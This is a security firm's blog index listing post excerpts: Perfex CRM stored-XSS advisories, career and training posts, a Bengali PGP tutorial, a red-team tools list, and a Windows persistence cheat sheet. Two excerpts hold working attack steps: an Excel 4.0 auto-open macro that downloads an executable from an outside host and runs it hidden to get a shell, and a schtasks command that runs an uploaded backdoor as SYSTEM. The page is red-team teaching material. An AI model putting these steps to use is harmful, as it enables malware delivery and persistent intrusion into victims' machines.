Blog

Stored xss in Perfex CRM 3.2.1 Contracts Module

Stored Cross-Site Scripting (XSS) Vulnerability in Perfex CRM Contracts Module A Stored Cross-Site Scripting (XSS) vulnerability exists in the Contracts Module of Perfex CRM, allowing authenticated client users to inject malicious JavaScript payloads. The input is stored in the contract discussion section and executes when an administrator views the contract, potentially leading to session hijacking, phishing attacks, or full account compromise. Example Request: POST /perfex/contract/3/33a4e5c951a2eb02fd0cb5da5af0ad3e HTTP/1.1 Host: 192.168.1.11 Content-Length: 139 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.
Read more →
Mar 18, 2025
Stored xss in Perfex CRM 3.2.1 Project Discussions

Stored Cross-Site Scripting (XSS) Vulnerability in Perfex CRM Project Discussions A Stored Cross-Site Scripting (XSS) vulnerability exists in the Project Discussions Module of Perfex CRM, allowing authenticated client users to inject malicious JavaScript payloads. The input is stored in the discussion description and executes whenever another user views the discussion, leading to session hijacking, phishing attacks, or full account compromise. Request: POST /perfex/clients/project/2 HTTP/1.1 Host: 192.168.1.11 Content-Length: 173 Cache-Control: max-age=0 Accept-Language: en-US,en;q=0.
Read more →
Mar 18, 2025
Tmux Cheat Sheet

Hello Bytium #!/usr/bin/bash #This is Comment echo "Hello Bytium" printf "Hello Bytium" Save as hello.sh , give it execute permission chmod +x hello.sh and run ./hello.sh Parameters #!/usr/bin/bash #This is Comment echo -e "Hello $1" printf "Hey, how is it goin $1?" echo "" $1 is the first parameters, second parameters should be $2 and so on. Variables Variables used to store data to use in future by referencing to the variable name!
Read more →
Sep 21, 2024
Why Bangladeshi Businesses Vulnerable to Cyber Attacks

Bangladesh’s Government is taking multiple steps to digitalize the country. This effort is appreciable. On the other side, cyber attacks in Bangladesh are also increasing. We know the cyber security workforce shortage is a global issue, and on the other side, Bangladesh faces unique hurdles. Additionally, We have noticed that the businesses of Bangladesh are not taking proper steps to protect them from cyber attacks that are happening often. Let’s discuss this in detail.
Read more →
Sep 21, 2024
How About Hiring a Freelance Cybersecurity Expert?

Many people asked me if the freelancing marketplace right place to start the cybersecurity career. As we know, Day by day businesses are relying on digital platforms, causing the need for strong cybersecurity became mandatory. In this growing demand, many professionals now work as freelancers on various online platforms. Is it right platform everyone to hire cybersecurity professional or to search for right jobs? Let’s see. Understanding the Cybersecurity Expertise Before discussing the freelance cybersecurity expert, let’s quickly understand their cybersecurity expertise.
Read more →
Sep 20, 2024
Start Your Cybersecurity Journey

I work with a skilled team at Bytium, where most members are OSCP and OSCE3 certified, and we always strive to learn new methods as they evolve. From my practical experience, I can say that no single training can make someone a cybersecurity expert. It is a long journey! However, there obviously should be a starting path, right? If you are ever looking to start with Cybersecurity and don’t know where to start:
Read more →
Sep 20, 2024
The story of being only OSCE3 from Bangladesh

You may already know me, I am Jobyer Ahmed, live in Bangladesh. Another identity is the founder of RedNode (Previously Redtm). I proudly want to say recently I became OSCE3(OffSec Certified Expert) Certified, and perhaps, I am the only person holding this certificate in Bangladesh. I also have earned other certificates, such as OSCP, Pentest+, Security+, and some others. I wanted to share my journey in the hopes that it might inspire others who have similar aspirations.
Read more →
Sep 20, 2024
Top 5 red Teaming Training and Certifications

It is Red Teaming. Huh? Wow, What is Red Teaming? It is about acting as real cyber threats to attack organizations from different angles to find weaknesses and report to the internal team. The Red team is highly skilled in taking advantage of Human, Technical, and physical weaknesses. So, what is usually involved with Red Teaming? Before having a quick look, be informed that It is crucial to bypass the defense and perform every step in stealth mode.
Read more →
Sep 20, 2024
পিজিপি দিয়ে ইমেইল ও ডাটা এনক্রিপ্ট করা

বাংলাদেশে অনেকেই এখন এথিক্যাল হ্যাকিং শিখতে আগ্রহী। বাজার প্রসার হচ্ছে। আমরা এথিক্যাল হ্যাকিং শিখি অন্যদের তথকে সুরক্ষিত রাখতে। কিন্তু আমরা কি আমাদের নিজেদের সুপার সিক্রেট মেসেজকে কিভাবে সিক্রেট রাখতে হয় তা জানি? আমার প্রিয় একটা পদ্ধতি হলো “PGP দিয়ে মেসেজ/ইমেইল/টেক্সট এনক্রিপট করা”। এনক্রিপশন হয়তো অনেকে জানে, আবার হয়তো কেউ কেউ জানেই না। এমনকি জিমেইল, ইয়াহু, হটমেইল থেকেও? অনেকে হয়তো বলবে “ধুর, ওদের কি সময় আছে আমার মেসেজ দেখার? আর দেখলেও বা কি হবে” তাই প্লেইন টেক্সট মেসেজ-ই সেন্ড করে। যেদিন আপনাকে ফোর্সফুলি কোনো ডাটা এনক্রিপ্ট/ডিক্রিপ্ট করতে হবে সেদিন হয়তো এটার উপর টিউটোরিয়াল গুগল-এ সার্চ করতে হবে। যাইহোক, থিওরি একদম ভালো লাগে না।
Read more →
Sep 20, 2024
Windows Persistence Cheatsheet

Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me! Schedule Task We can create schedule to execute our specified binary or command. For example if we want to execute UpdateMessenger.exe every two hour. We can use below methods. Native Windows Command Upload your backdoor and run following command: schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM" Using SharPersist .
Read more →
May 14, 2022
Red Team Tools Collection

This is a collection of red teaming tools that will help in red team engagements. The list is not complete, so i will keep updating it! Reconnaissance These tools are used to gather information passively or actively. Tools Name Descriptions Nmap Port/Service/Vulnerability Scanner DnsRecon, Amass DNS Enumeration Tool Nikto Website Misconfiguration Finder Burp Suite Pro Web Analyzing Semi-auto Tool theHarvester Find sub-domain, email address and employee info Metgoofil Extract pdf,doc,xls, etc SpiderFoot Open-source Information Gathering framework Recon-ng Open-source Information Gathering framework Weaponization & Initial Foothold Cracking Password Password attacking tools for initial footholds
Read more →
May 9, 2022
Microsoft Excel Payload

Microsoft Excel Payload for initial foothold is old method but still widely used by APTs. Microsoft Excel 4.0 Macro Payload Right click on the workbook and click insert Select MS Excel 4.0 Macro paste following payload: =EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe") =WAIT(NOW()+"00:00:10") =EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe") =HALT() Now Select first cell and rename it to Auto_Open Save as Excel 97-2003 Workbook(XLS) When victim Enable Content We get shell
Read more →
Mar 26, 2022

1
2
3